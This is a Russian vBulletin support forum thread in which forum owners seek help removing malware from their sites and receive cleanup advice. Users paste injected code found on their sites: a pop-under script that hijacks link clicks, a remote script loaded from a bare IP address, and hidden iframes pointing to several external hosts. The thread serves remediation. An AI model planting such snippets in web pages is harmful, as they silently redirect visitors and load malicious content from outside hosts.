форум vBSupport.ru > vBulletin > vBulletin 4.0.x-4.1.х > Вопросы по vBulletin 4.0.x-4.1.х
Register Меню vBsupport Изображения Files Manager О рекламе Today's Posts Search
  • Родная гавань
  • Блок РКН снят
  • Premoderation
  • For English speaking users
  • Каталог Фрилансеров
  • If you want to buy some product or script
  • Администраторам
VBsupport перешел с домена .ORG на родной .RU Ура! Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей

Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
for English speaking users:
You may be surprised with restriction of access to the attachments of the forum. The reason is the recent change in vbsupport.org strategy:

- users with reputation < 10 belong to "simple_users" users' group
- if your reputation > 10 then administrator (kerk, Luvilla) can decide to move you into an "improved" group, but only manually

Main idea is to increase motivation of community members to share their ideas and willingness to support to each other. You may write an article for the subject where you are good enough, you may answer questions, you may share vbulletin.com/org content with vbsupport.org users, receiving "thanks" equal your reputation points. We should not only consume, we should produce something.

- you may:
* increase your reputation (doing something useful for another members of community) and being improved
* purchase temporary access to the improved category:
10 $ for 3 months. - this group can download attachments, reputation/posts do not matter.
20 $ for 3 months. - this group can download attachments, reputation/posts do not matter + adds eliminated + Inbox capacity increased + files manager increased permissions.

Please contact kerk or Luvilla regarding payments.

Important!:
- if your reputation will become less then 0, you will be moved into "simple_users" users' group automatically.*
*for temporary groups (pre-paid for 3 months) reputation/posts do not matter.
Уважаемые пользователи!

На форуме открыт новый раздел "Каталог фрилансеров"

и отдельный раздел для платных заказов "Куплю/Закажу"

Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже:
Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота.
Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
 
 
 
 
parkourman
Простоузер
Default как удалить вирус?
0

Всем добрый вечер, вот задался вопросом как удалить вирус на сайте shadow-market.ru вообще не понимаю где его искать не могли бы подсказать?
Bot
Yandex Bot Yandex Bot is online now
 
Join Date: 05.05.2005
Реклама на форуме А что у нас тут интересного? =)
 
 
OldEr
Специалист
Master
 
OldEr's Avatar
Default
0

parkourman, перезалейте файлы с чистого дистрибутива и поудаляйте все index.htm(l).

P.S Не забудьте сделать бэкап текущих файлов.
 
 
Luvilla
Гость
Default

Quote:
Originally Posted by parkourman View Post
вот задался вопросом
интересно...
вопрос - теоретический?

parkourman, о чём речь? скрипт, который цепляет trfmxk.info на страницу?
ищите в файлах
сегодня с утра у меня был вызов на форум - с почти таким же скриптом и именно этим доменом в скрипте, он был в index.php и в конфиге

проверить модули, нет ли чего лишнего
кстати, если обнаружите что-то на faq_complete - отпишитесь, интересно...
+ стандартные процедуры
 
 
parkourman
Простоузер
Default
0

а просто где нибудь найти в шаблоне никак нельзя?
 
 
Luvilla
Гость
Default

Quote:
Originally Posted by parkourman View Post
а просто где нибудь найти в шаблоне никак нельзя?
ищите... кто не даёт?
 
 
parkourman
Простоузер
Default
0

Luvilla вроде все проверил все шаблоны, модули все, ничего нет лишнего
 
 
Luvilla
Гость
Default

Quote:
Originally Posted by parkourman View Post
ничего нет лишнего
Quote:
Originally Posted by Luvilla View Post
ищите в файлах
м?
 
 
parkourman
Простоузер
Default
0

проверил из шаблонов header home что ещё слудует проверить?

parkourman добавил 17.06.2011 в 23:54
а вот смотрите что я нашел:
Code:
if (navigator.cookieEnabled)
{
    var pop_under = null;
    var pop_cookie_name = "gavgav1";
    var pop_timeout = 720;

    function pop_cookie_enabled()
    {
        var is_enabled = false;
        if (!window.opera && !navigator.cookieEnabled)
         return is_enabled;

        if (typeof document.cookie == 'string')
          if (document.cookie.length == 0)
          {
              document.cookie = "test";
              is_enabled = document.cookie == 'test';
              document.cookie = '';
          }
          else
          {
              is_enabled = true;
          }
          return is_enabled;
   }

   function pop_getCookie(name)
   {
       var cookie = " " + document.cookie;
       var search = " " + name + "=";
       var setStr = null;
       var offset = 0;
       var end = 0;
       if (cookie.length > 0)
       {
           offset = cookie.indexOf(search);
           if (offset != -1)
           {
               offset += search.length;
               end = cookie.indexOf(";", offset);
               if (end == -1)
               {
                   end = cookie.length;
               }
            setStr = unescape(cookie.substring(offset, end));
        }
    }
    return(setStr);
   }

   function pop_setCookie (name, value)
   {
        document.cookie = name + "=" + escape(value) + ";expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";
   }

   function show_pop()
   {
      var pop_wnd = "http://white-traff.in/in.cgi?parkourman2010";


       var fea_wnd = "scrollbars=1,resizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";
       var need_open = true;
       if (document.onclick_copy != null)
         document.onclick_copy();
       if (document.body.onbeforeunload_copy != null)
         document.body.onbeforeunload_copy();
       if (pop_under != null)
       {
         if (!pop_under.closed)
           need_open = false;
       }

       if (need_open)
       {
           if (pop_cookie_enabled())
           {
               val = pop_getCookie(pop_cookie_name);
               if (val != null)
               {
                   now = new Date();
                   val2 = new Date(val);
                utc1 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());
                utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());
                if ((utc1 - utc2)/1000 < pop_timeout*60)
                {
                    need_open = false;
                }
            }
        }
    }

    if (need_open)
    {
        under = window.open(pop_wnd, "", fea_wnd);
        under.blur();   

        window.focus();
        if (pop_cookie_enabled())
        {
            now = new Date();
            pop_setCookie(pop_cookie_name, now);
        }
       }
   }

   function pop_init()
   {
         var ver = parseFloat(navigator.appVersion);
         var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4);
      if (ver2)
      {
          if (document.links)
          {
              for (var i=0; i<document.links.length; i++)
              {
                  if (document.links[i].target != "_blank")
                  {
                      document.links[i].onclick_copy = document.links[i].onclick;
                      document.links[i].onclick = show_pop;
                 }
             }
         }
      }
      document.onclick_copy = document.onclick;
      document.onmouseup = show_pop;return true;
   }
   pop_init();
}
это же не относиться к вобле7

parkourman добавил 18.06.2011 в 00:18
а вот и сам код
Code:
</div><script language="JavaScript" src="http://46.4.98.91/followbb.php?i=19983"></script><iframe src="http://178.63.96.144/?rb" style="visibility: hidden;"></iframe><iframe src="http://178.63.96.168/?rb" style="visibility: hidden;"></iframe><iframe src="http://178.63.96.170/?rb" style="visibility: hidden;"></iframe><iframe src="http://46.4.98.91/?inid=19983&amp;intime=654171370" style="visibility: hidden;"></iframe>

Last edited by parkourman : 06-18-2011 at 12:18 AM. Reason: Добавлено сообщение
 
 
eralcoil
Простоузер
Default Удаление вириса с vbulletin 4.0.4
0

Доброго времени суток.
Прошу помощи в удалении вируса с форума.
celestialbeing.ru - на него ругается гугл и яндекс. Проверил сайт через http://www.siteguard.ru/ и были обнаружены 2 Javascript:

Код:

Code:
<script type="text/javascript"> window.LESS_THAN_IE7 = true; </script>
и
Код:

Code:
<script type="text/javascript">//<![CDATA[ var a='',js=10;try{a+=';r='+escape(document.referrer);}catch(e){}try{a+=';j='+navigator.javaEnabled();js=11;}catch(e){} try{s=screen;a+=';s='+s.width+'*'+s.height;a+=';d='+(s.colorDepth?s.colorDepth:s.pixelDepth);js=12;}catch(e){} try{if(typeof((new Array).push('t'))==="number")js=13;}catch(e){} try{document.write('<a href="http://top.mail.ru/jump?from=2193358">'+ '<img src="http://d7.c7.b1.a2.top.mail.ru/counter?id=2193358;t=175;js='+js+a+';rand='+Math.random()+ '" alt="Рейтинг@Mail.ru" style="border:0;" height="15" width="88" \/><\/a>');}catch(e){}//]]></script>

а так же 1 IFrame:

Код:

Code:
<iframe width='9' height='6' src='http://www.flepstudio.org/od.php' frameborder='0' scrolling='no'>
Является ли это вирусами?
Запутался каким образом их найти и как удалить эти скрипты?
В поиск через админку в шаблонах? все облазил, что требуется удалить не смог найти. Прошу помочь. Спасибо за внимание

eralcoil добавил 28.08.2012 в 12:07
IFrame удалось удалить. 2 первых Javascript не как не удалось найти =/

Last edited by eralcoil : 08-28-2012 at 12:07 PM. Reason: Добавлено сообщение
 


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off




All times are GMT +4. The time now is 11:47 AM.


Powered by vBulletin® Version 4.x.fuck
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.